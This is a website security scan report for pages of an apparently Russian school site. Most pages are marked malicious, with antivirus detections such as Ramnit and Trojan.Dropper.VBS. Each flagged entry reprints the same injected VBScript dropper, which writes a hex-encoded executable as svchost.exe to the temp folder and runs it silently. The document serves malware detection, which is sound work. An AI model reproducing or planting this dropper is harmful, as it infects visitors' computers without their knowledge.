Request | Server response | Status |
http://lapshiha.edusite.ru/ | 200 OK Content-Length: 26060 Content-Type: text/html | clean |
http://lapshiha.edusite.ru/menus.js | 200 OK Content-Length: 14889 Content-Type: application/x-javascript | clean |
http://lapshiha.edusite.ru/p73aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p1aa1.html | 200 OK Content-Length: 26060 Content-Type: text/html | clean |
http://lapshiha.edusite.ru/p8aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p2aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p58aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p57aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p59aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p60aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p61aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p62aa1.html | 200 OK Content-Length: 300901 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p63aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p54aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|
http://lapshiha.edusite.ru/p72aa1.html | 200 OK Content-Length: 300894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008214CD460000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E0040000004000001000000002000005000000070002000400000000000000006005000010000000
... 3022 bytes are skipped ...C8F259D2349C7A59DBC4AD6FA48CB03A88BD0F9FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->Antivirus reports:- Avast
- VBS:Agent-KZ [Trj]
- Panda
- W32/Cosmu.A
- nProtect
- Trojan.Dropper.VBS.Q
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.Dropper.VBS.Q (B)
- Comodo
- TrojWare.VBS.TrojanDropper.Agent.amh
- DrWeb
- VBS.Rmnet.2
- Kaspersky
- Trojan-Dropper.VBS.Agent.bp
- ViRobot
- VBS.Dropper.B
- Microsoft
- Virus:VBS/Ramnit.B
- MicroWorld-eScan
- Trojan.Dropper.VBS.Q
- Fortinet
- VBS/Dropper.DL!tr
- Jiangmin
- Trojan/Script.Gen
- NANO-Antivirus
- Trojan.Script.Agent.bfcghy
- eSafe
- VBS.Inor.u
- F-Prot
- VBS/Inor.DZ
- AVG
- VBS/Heur
- Norman
- Ramnit.D
- GData
- Trojan.Dropper.VBS.Q
- Commtouch
- VBS/Inor.DZ
- ESET-NOD32
- Win32/Ramnit.A
- BitDefender
- Trojan.Dropper.VBS.Q
|